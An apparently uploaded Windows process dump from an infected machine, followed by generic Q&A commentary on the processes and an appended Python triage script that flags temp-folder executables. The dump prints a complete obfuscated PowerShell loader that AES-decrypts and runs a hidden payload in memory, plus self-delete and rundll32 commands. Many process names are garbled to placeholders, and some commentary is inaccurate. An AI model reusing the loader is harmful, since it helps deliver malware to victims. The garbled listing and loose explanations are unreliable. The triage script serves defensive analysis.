Windows Process List Overview

The document lists process information from a system, including the process ID, name, and command line. It includes common system processes like csrss.exe, winlogon.exe, and explorer.exe as well as applications like RiotClientServices.exe, AdobeIPCBroker.exe, and TotalCMD.exe. A variety of other processes are also referenced, indicating it is summarizing process information from an active system.

Uploaded by

matheus23kayna

ID: 912, Name: csrss.exe, CommandLine:
===============
ID: 1172, Name: [Link], CommandLine:
===============
ID: 1228, Name: [Link], CommandLine:
===============
ID: 1300, Name: [Link], CommandLine:
===============
ID: 2644, Name: [Link], CommandLine:
===============
ID: 7072, Name: [Link], CommandLine: [Link]
===============
ID: 6544, Name: [Link], CommandLine: C:\Windows\system32\[Link] -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 6924, Name: [Link], CommandLine: C:\Windows\system32\[Link] -k
UnistackSvcGroup -s WpnUserService
===============
ID: 6868, Name: [Link], CommandLine: C:\Windows\system32\
[Link] -asus2357start -hide
===============
ID: 3664, Name: [Link], CommandLine: [Link] {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 7432, Name: [Link], CommandLine:
===============
ID: 7688, Name: [Link], CommandLine: C:\Windows\[Link]
===============
ID: 7952, Name: [Link], CommandLine: C:\Windows\system32\[Link] -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 8208, Name: [Link], CommandLine: "C:\Windows\SystemApps\
[Link].StartMenuExperienceHost_cw5n1h2txyewy\
[Link]" -
ServerName:[Link]
===============
ID: 8432, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 8636, Name: [Link], CommandLine: "C:\Windows\SystemApps\
[Link].Search_cw5n1h2txyewy\[Link]" -
ServerName:[Link]
===============
ID: 8764, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 9992, Name: [Link], CommandLine: "C:\Program Files\
WindowsApps\Microsoft.YourPhone_1.23112.87.0_x64__8wekyb3d8bbwe\
[Link]" -ComServer:Background -Embedding
===============
ID: 9468, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 10340, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 10888, Name: [Link], CommandLine: "C:\Windows\SystemApps\
[Link].CBS_cw5n1h2txyewy\[Link]" -
ServerName:[Link]
===============
ID: 11332, Name: [Link], CommandLine: "C:\Windows\System32\
[Link]"
===============
ID: 11484, Name: [Link], CommandLine: "C:\Program Files\TightVNC\
[Link]" -controlservice -slave
===============
ID: 11544, Name: [Link], CommandLine: [Link] /nogui
===============
ID: 11568, Name: [Link], CommandLine: "C:\Program Files\Riot Vanguard\
[Link]"
===============
ID: 11616, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Microsoft\
OneDrive\[Link]" /background
===============
ID: 12032, Name: [Link], CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\[Link]"
===============
ID: 12048, Name: [Link], CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\libs\[Link]" "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\js\[Link]"
===============
ID: 12056, Name: [Link], CommandLine: \??\C:\Windows\system32\[Link] 0x4
===============
ID: 12132, Name: [Link], CommandLine: "C:\Riot Games\Riot Client\
[Link]" --launch-background-mode
===============
ID: 12236, Name: [Link], CommandLine: "C:\Program Files (x86)\Common
Files\Adobe\Adobe Desktop Common\IPCBox\[Link]" "-launchedbyvulcan-
12048 C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\libs\[Link]"
===============
ID: 1576, Name: [Link], CommandLine: "C:\Riot Games\Riot
Client\[Link]" --no-rate-limit "--attachment=2024-01-28T23-18-
08_12132_Riot_Client.[Link]=C:/Users/User/AppData/Local/Riot Games/Riot
Client/Logs/Riot Client Logs/2024-01-28T23-18-08_12132_Riot [Link]" "--
attachment=2024-01-28T23-18-08_12132_Riot_Client.log=C:/Users/User/AppData/Local/
Riot Games/Riot Client/Logs/Riot Client Logs/2024-01-28T23-18-08_12132_Riot
[Link]" "--attachment=__sentry-breadcrumb1=C:\Users\User\AppData\Local\Riot
Games\Riot Client\Crashes\Riot Client\[Link]\
__sentry-breadcrumb1" "--attachment=__sentry-breadcrumb2=C:\Users\User\AppData\
Local\Riot Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-
[Link]\__sentry-breadcrumb2" "--attachment=__sentry-event=C:\Users\User\
AppData\Local\Riot Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-
[Link]\__sentry-event" "--database=C:\Users\User\AppData\Local\Riot
Games\Riot Client\Crashes\Riot Client" "--metrics-dir=C:\Users\User\AppData\Local\
Riot Games\Riot Client\Crashes\Riot Client"
--url=[Link]
sentry_key=dc54709324504ab18ddf517a83f99e1a --initial-client-
data=0x378,0x3f8,0x3c8,0x384,0x3e0,0x6f64ed88,0x6f64ed98,0x6f64eda8
===============
ID: 12968, Name: [Link], CommandLine: "C:\Program Files\TrustEdgeID\
[Link]"
===============
ID: 13048, Name: [Link], CommandLine: "C:\Program Files (x86)\Common Files\
Java\Java Update\[Link]"
===============
ID: 13108, Name: [Link], CommandLine: "C:\Program Files\
Native Instruments\Komplete Audio Driver\W10_x64\[Link]"
-hide
===============
ID: 13220, Name: [Link], CommandLine: "C:\Program Files\AMD\CNext\
CNext\[Link]" atlogon
===============
ID: 4892, Name: [Link], CommandLine: "C:\Program Files\AMD\CNext\CNext\
[Link]" watch 13220
===============
ID: 12700, Name: [Link], CommandLine:
===============
ID: 7664, Name: [Link], CommandLine:
===============
ID: 1188, Name: [Link], CommandLine: "C:\Program Files\Microsoft Office\
Office15\[Link]"
===============
ID: 2860, Name: [Link], CommandLine: C:\Windows\system32\
[Link] -Embedding
===============
ID: 11460, Name: [Link], CommandLine: "C:\Program Files\
WindowsApps\Microsoft.ZuneMusic_11.2312.7.0_x64__8wekyb3d8bbwe\
[Link]" -
ServerName:[Link]
===============
ID: 8372, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 9348, Name: [Link], CommandLine: C:\Windows\System32\[Link] -k
UnistackSvcGroup
===============
ID: 12828, Name: [Link], CommandLine: C:\Windows\system32\[Link]
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 10116, Name: [Link], CommandLine: "C:\Program Files (x86)\Common Files\
Java\Java Update\[Link]" -auto
===============
ID: 13648, Name: [Link], CommandLine: "C:\Program Files\AMD\CNext\
CNext\[Link]" --type=utility --enable-
features=AllowContentInitiatedDataUrlNavigations,TracingServiceInProcess --disable-
features=BackgroundFetch,ConsolidatedMovementXY,DnsOverHttpsUpgrade,FormControlsRef
resh,MojoVideoCapture,PictureInPicture,SmsReceiver,UseSkiaRenderer,WebPayments,WebU
SB --lang=sr --service-sandbox-type=network --use-gl=angle --application-
name=Radeonsoftware --webengine-schemes=qrc:sLV --mojo-platform-channel-handle=5208
/prefetch:8
===============
ID: 4216, Name: [Link], CommandLine: "C:\Program Files\AMD\CNext\CNext\
[Link]" fb28e830-7c29-4591-b2df-4e16275fa0d9 SOFTWARE\AMD\DVR\Overlays
===============
ID: 8616, Name: [Link], CommandLine: C:\Windows\System32\[Link] -
Embedding
===============
ID: 9880, Name: [Link], CommandLine: "E:\Instalacije\Totalcmd\[Link]"
===============
ID: 5152, Name: [Link], CommandLine: "C:\Program Files\Avast Software\Avast\
[Link]" --type=gpu-process --field-trial-
handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --no-sandbox --disable-gpu-driver-bug-
workarounds --log-file="C:\Users\User\AppData\Roaming\Avast Software\Avast\log\
cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0 AppleWebKit/537.36
(KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium (0.0.0) (Windows
10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --force-wave-audio
--disable-software-rasterizer --no-sandbox --blacklist-accelerated-compositing --
disable-accelerated-2d-canvas --disable-accelerated-compositing --disable-
accelerated-layers --disable-accelerated-video-decode --blacklist-webgl --disable-
bundled-ppapi-flash --disable-flash-3d --enable-aggressive-domstorage-flushing --
enable-media-stream --disable-gpu --disable-webgl --disable-gpu-compositing --
allow-file-access-from-files=1 --pack_loading_disabled=1 --gpu-
preferences=SAAAAAAAAADgAABwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAA
AAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIA
AAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --log-file="C:\Users\User\AppData\
Roaming\Avast Software\Avast\log\cef_log.txt" --mojo-platform-channel-
handle=8416 /prefetch:2
===============
ID: 4712, Name: [Link], CommandLine: "C:\Program Files\Avast Software\Avast\
[Link]" --type=utility --utility-sub-type=[Link] --
field-trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=utility --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=8608 /prefetch:8
===============
ID: 12392, Name: [Link], CommandLine: "C:\Program Files\Avast Software\Avast\
[Link]" --type=utility --utility-sub-type=[Link] --
field-trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=none --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=8660 /prefetch:8
===============
ID: 9868, Name: [Link], CommandLine: "C:\Program Files\Avast Software\Avast\
[Link]" --type=utility --utility-sub-type=[Link] --field-
trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=audio --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=10108 /prefetch:8
===============
ID: 12584, Name: [Link], CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\[Link]" -
ServerName:[Link]
===============
ID: 5060, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 13356, Name: [Link], CommandLine: C:\Windows\System32\oobe\
[Link] -Embedding
===============
ID: 7412, Name: [Link], CommandLine: "C:\Program Files\Adobe\Acrobat
DC\Acrobat\[Link]"
===============
ID: 3508, Name: [Link], CommandLine: "C:\Program Files\Adobe\Acrobat
DC\Acrobat\[Link]" --type=collab-renderer --proc=7412
===============
ID: 9876, Name: [Link], CommandLine:
===============
ID: 13096, Name: [Link], CommandLine: C:\Users\User\AppData\Local\Temp\[Link]
===============
ID: 4120, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\f4728982-
a5a0-4742-973b-67968a402246\[Link]"
===============
ID: 11312, Name: [Link], CommandLine: C:\Users\User\AppData\Local\Temp\[Link]
===============
ID: 10264, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Temp\
d887ceb89d\[Link]"
===============
ID: 13132, Name: [Link], CommandLine: C:\Windows\System32\
[Link] -Embedding
===============
ID: 9576, Name: [Link], CommandLine: "C:\Users\User\AppData\
Local\Temp\jobA4aodo3bpwLTVri\[Link]"
===============
ID: 12004, Name: [Link], CommandLine: C:\Windows\System32\[Link] -
Embedding
===============
ID: 14608, Name: [Link], CommandLine:
===============
ID: 14760, Name: opera_autoupdate.exe, CommandLine:
===============
ID: 14780, Name: opera_autoupdate.exe, CommandLine:
===============
ID: 11964, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Temp\
1000718001\[Link]"
===============
ID: 3620, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Temp\
1000721001\[Link]"
===============
ID: 14900, Name: [Link], CommandLine: C:\Windows\system32\[Link] /c C:\Users\
User\AppData\Local\Temp\[Link]
===============
ID: 14928, Name: [Link], CommandLine: \??\C:\Windows\system32\[Link] 0x4
===============
ID: 10204, Name: [Link], CommandLine: C:\Windows\system32\[Link]
===============
ID: 11480, Name: [Link], CommandLine: [Link]
===============
ID: 9708, Name: [Link], CommandLine: "[Link]" -noprofile -
windowstyle hidden -ep bypass -command $_CASH_qaVPf = [[Link]]::
('txeTllAdaeR'[-1..-11] -join '')('C:\Users\User\AppData\Local\Temp\
[Link]').Split([Environment]::NewLine);foreach ($_CASH_fIZHT in $_CASH_qaVPf)
{ if ($_CASH_fIZHT.StartsWith(':: @')) { $_CASH_XqEBS = $_CASH_fIZHT.Substring(4);
break; }; };$_CASH_XqEBS =
[[Link]]::Replace($_CASH_XqEBS, '_CASH_', '');
$_CASH_AbGjb = [[Link]]::('gnirtS46esaBmorF'[-1..-16] -join '')
($_CASH_XqEBS);$_CASH_xbtcQ = New-Object [Link];
$_CASH_xbtcQ.Mode = [[Link]]::CBC;
$_CASH_xbtcQ.Padding =
[[Link]]::PKCS7;$_CASH_xbtcQ.Key =
[[Link]]::('gnirtS46esaBmorF'[-1..-16] -join '')
('xnU+qixX8GxmNdtUiuJWKTS5382DUH1RFgNRqJG+Kzg=');$_CASH_xbtcQ.IV =
[[Link]]::('gnirtS46esaBmorF'[-1..-16] -join '')
('q4+6cHkazpcj3F4mKI+rYw==');$_CASH_KXHue = $_CASH_xbtcQ.CreateDecryptor();
$_CASH_AbGjb = $_CASH_KXHue.TransformFinalBlock($_CASH_AbGjb, 0,
$_CASH_AbGjb.Length);$_CASH_KXHue.Dispose();$_CASH_xbtcQ.Dispose();$_CASH_kEHGI =
New-Object [Link](, $_CASH_AbGjb);$_CASH_Kscdn = New-Object
[Link];$_CASH_Lfmtj = New-Object
[Link]($_CASH_kEHGI,
[[Link]]::Decompress);$_CASH_Lfmtj.CopyTo($_CASH_Kscdn);
$_CASH_Lfmtj.Dispose();$_CASH_kEHGI.Dispose();$_CASH_Kscdn.Dispose();$_CASH_AbGjb =
$_CASH_Kscdn.ToArray();$_CASH_kHyYf = [[Link]]::('daoL'[-1..-4]
-join '')($_CASH_AbGjb);$_CASH_ZMxsS = $_CASH_kHyYf.EntryPoint;
$_CASH_ZMxsS.Invoke($null, (, [string[]] ('')))
===============
ID: 3688, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Temp\
[Link]"
===============
ID: 10724, Name: [Link], CommandLine: C:\Windows\system32\
WindowsPowerShell\v1.0\[Link] Start-Process "C:\Users\User\AppData\Local\
Temp\[Link]" -Verb runAs
===============
ID: 1376, Name: [Link], CommandLine: \??\C:\Windows\system32\[Link] 0x4
===============
ID: 9024, Name: [Link], CommandLine:
===============
ID: 13452, Name: [Link], CommandLine: "C:\Windows\[Link]\Framework\
v4.0.30319\[Link]"
===============
ID: 13336, Name: [Link], CommandLine: [Link]
===============
ID: 13392, Name: [Link], CommandLine:
===============
ID: 12588, Name: [Link], CommandLine:
===============
ID: 2208, Name: [Link], CommandLine: "C:\Windows\[Link]\Framework\
v4.0.30319\[Link]"
===============
ID: 12296, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Temp\
1000726001\[Link]"
===============
ID: 12448, Name: [Link], CommandLine: "C:\Users\User\AppData\Roaming\
configurationValue\[Link]"
===============
ID: 9584, Name: [Link], CommandLine: "C:\Windows\[Link]\Framework\
v4.0.30319\[Link]"
===============
ID: 7984, Name: [Link], CommandLine: "C:\Windows\[Link]\Framework\
v4.0.30319\[Link]"
===============
ID: 3364, Name: [Link], CommandLine:
===============
ID: 4148, Name: [Link], CommandLine: "C:\Windows\[Link]\Framework\
v4.0.30319\[Link]"
===============
ID: 10660, Name: [Link], CommandLine:
===============
ID: 4636, Name: [Link], CommandLine:
===============
ID: 10740, Name: [Link], CommandLine: C:\Windows\system32\[Link] /c choice /C
Y /N /D Y /T 3 & Del "C:\Users\User\AppData\Local\Temp\1000731001\[Link]"
===============
ID: 11744, Name: [Link], CommandLine: \??\C:\Windows\system32\[Link] 0x4
===============
ID: 11840, Name: [Link], CommandLine: "C:\Windows\System32\[Link]" C:\
Users\User\AppData\Roaming\006700e5a2ab05\[Link], Main
===============
ID: 2000, Name: [Link], CommandLine: choice /C Y /N /D Y /T 3
===============
ID: 8036, Name: [Link], CommandLine:
===============
ID: 3644, Name: [Link], CommandLine:
===============
ID: 8668, Name: [Link], CommandLine: "C:\Users\User\AppData\Local\Temp\
d887ceb89d\[Link]"

Common questions

The diversity of command-line arguments across different processes reflects custom configurations and specific operational contexts tailored to their functions. For instance, "Microsoft.Media.Player.exe" with server-specific naming and "ShellExperienceHost.exe" with server name-based command-line arguments indicate role-specific operations in application management and interface configuration. These arguments dictate how processes behave, manage resources, and interact with user settings, revealing an intricate approach towards personalization and precise operation environments within Windows.

Multiple instances of "RuntimeBroker.exe" suggest it has various functionalities within the system, operating across different contexts. These instances typically manage access permissions for applications running in the background, ensuring they don't misuse system resources. This can be seen by observing the multiple command lines, all executing with the -Embedding flag, which indicates it's responsible for coordinating between applications and giving them the proper permissions without having direct access to critical resources.

The process "svchost.exe" acts as a generic host process for services that run from dynamic-link libraries (DLLs). Its varying command lines and service group associations indicate it hosts multiple services, with each command line specifying a different service to manage under the svchost executable. For instance, "C:\Windows\system32\svchost.exe -k UnistackSvcGroup" suggests grouping related services to share resources efficiently.

The process "conhost.exe" (Console Window Host) provides backward compatibility for command-line applications running on Windows. Its execution via different entry points, such as with "0x4", suggests it manages console input/output operations and wraps legacy console applications with a graphical interface required by modern Windows environments. This aids in handling console applications' text inputs and outputs, showing its vital role in bridging traditional command-line tools with newer graphical interfaces.

"PhoneExperienceHost.exe" facilitates integration between Windows PC and mobile systems, evident by its command line flags: "-ComServer:Background -Embedding". These settings imply that the process runs as a background server, enabling features such as notifications and data synchronization with connected mobile devices. This enhances user experience by allowing seamless service communication and data management across platforms. The "Embedding" flag specifies internal operation without direct user interaction, signifying its integration-focused operation.

The execution of "explorhe.exe" from a temporary directory indicates an elevated risk of malware infection or unauthorized access, since temporary directories are often targeted in cyber attacks due to their less secured and transient nature. Regular administrative actions would include monitoring and validation of executable sources, implementing strict access controls, and timely scanning of temporary folders to detect any anomalies or unauthorized file executions. Proactively auditing and clearing temp directories as part of system hygiene can mitigate risks.

Specialized services like "TextInputHost.exe" demonstrate the system's adaptive interface capabilities by enhancing input handling for various input types, including touchscreen and stylus devices. Such a service ensures input methods adapt dynamically to the user's needs and environment, improving accessibility and user experience. The inclusion of "TextInputHost.exe" in the SystemApps suite signifies its role in managing multi-modal input methods, providing a bridge between traditional text entry and modern interactive device interfaces.

The extensive command-line switches seen with "AvastUI.exe" highlight the diverse functionality and configuration options of Avast antivirus. These switches govern how the application interacts with system resources, handles updates, and manages scanning operations, enabling customization and optimization for security needs. Switches such as "--type=gpu-process" and "--log-severity=error" denote targeted operational control over hardware acceleration and error logging, while managing multiple layers of its user interface (UI) and internal processes without compromising performance or security.

"AdobeIPCBroker.exe" highlights Adobe's approach to inter-process communication within its Creative Cloud applications, facilitating seamless workflows by allowing multiple Adobe applications to interact efficiently. Meanwhile, "node.exe" running alongside "Adobe Creative Cloud Experience" libraries suggests a use of Node.js for executing JavaScript code, reflecting Adobe's integration of web technologies for enhanced application functionalities. This integration enhances performance and feature deployment, showing Adobe's commitment to using modern technologies for real-time services and client updates.

Executing processes from temporary directories can pose significant security risks, highlighting vulnerabilities such as unauthorized or malicious code execution. Files like "fz9YqoSLnCrtpx1uiHT8.exe" executed from "C:\Users\User\AppData\Local\Temp" suggest they can bypass typical security measures due to their ambiguous nature and location. Such practices can be exploited in attacks where malicious code is introduced into a system via temporary files due to their transient nature, making detection and prevention challenging.
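The monitoring of executable sources described above can be sketched as a triage pass over a dump in this document's `ID / Name / CommandLine` layout. This is an added example, not part of the original document: the sample records are constructed, and the line-joining heuristic and the rule names are assumptions. A hit is a reason to look closer, not a verdict, since legitimate software also runs from AppData.

```python
import re

SEPARATOR = re.compile(r"^=+$")
RECORD = re.compile(r"^ID:\s*(\d+),\s*Name:\s*(.*?),\s*CommandLine:\s?(.*)$")
TEMP_IMAGE = re.compile(r"\\appdata\\local\\temp\\", re.I)
APPDATA_IMAGE = re.compile(r"\\appdata\\", re.I)
# An executable or script under AppData handed to another program as an argument.
APPDATA_ARG = re.compile(r'\\appdata\\[^"]*?\.(exe|dll|bat|cmd|ps1|vbs|js)\b', re.I)

# Constructed sample in the dump's layout; every name and path is made up.
SAMPLE = r"""
ID: 6544, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 4001, Name: updater_sample.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
a1b2c3\updater_sample.exe"
===============
ID: 4002, Name: cmd.exe, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\
User\AppData\Local\Temp\sample.bat
===============
ID: 4003, Name: sync_sample.exe, CommandLine: "C:\Users\User\AppData\Local\Vendor\
sync_sample.exe" /background
===============
ID: 4004, Name: csrss.exe, CommandLine:
===============
ID: 4005, Name: ui_sample.exe, CommandLine: "C:\Program Files\Vendor\ui_sample.exe" --log-file="C:\Users\User\AppData\Roaming\Vendor\log.txt"
"""


def unwrap(lines):
    """Re-join a hard-wrapped record. Heuristic (assumption): a line ending in
    a backslash, slash or hyphen was cut inside a token, any other at a space."""
    out = ""
    for line in (l.strip() for l in lines):
        if not line:
            continue
        if out and not out.endswith(("\\", "/", "-")):
            out += " "
        out += line
    return out


def parse_dump(text):
    """Split the dump on '=====' rows and parse each record into a dict."""
    records, block = [], []
    for line in text.splitlines() + ["="]:  # sentinel flushes the last record
        if SEPARATOR.match(line.strip()):
            m = RECORD.match(unwrap(block))
            if m:
                records.append({"pid": int(m.group(1)), "name": m.group(2),
                                "cmdline": m.group(3)})
            block = []
        else:
            block.append(line)
    return records


def image_path(cmdline):
    """First token of the command line: the quoted path, or text up to a space."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        path = cmdline[1:end] if end != -1 else cmdline[1:]
    else:
        path = cmdline.split(" ", 1)[0]
    return path[4:] if path.startswith("\\??\\") else path


def triage(rec):
    """Return a rule name for records worth a closer look, else None."""
    image = image_path(rec["cmdline"])
    if TEMP_IMAGE.search(image):
        return "image-in-temp"
    if APPDATA_IMAGE.search(image):
        return "image-in-appdata"
    if APPDATA_ARG.search(rec["cmdline"]):
        return "user-writable-argument"
    return None


def flag_dump(text):
    """List (pid, rule) for every record that matches a rule."""
    return [(r["pid"], rule) for r in parse_dump(text) if (rule := triage(r))]
```

Records with an empty command line are parsed but never flagged, and a log path under AppData (PID 4005 in the sample) does not trigger the argument rule because it names no executable or script.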
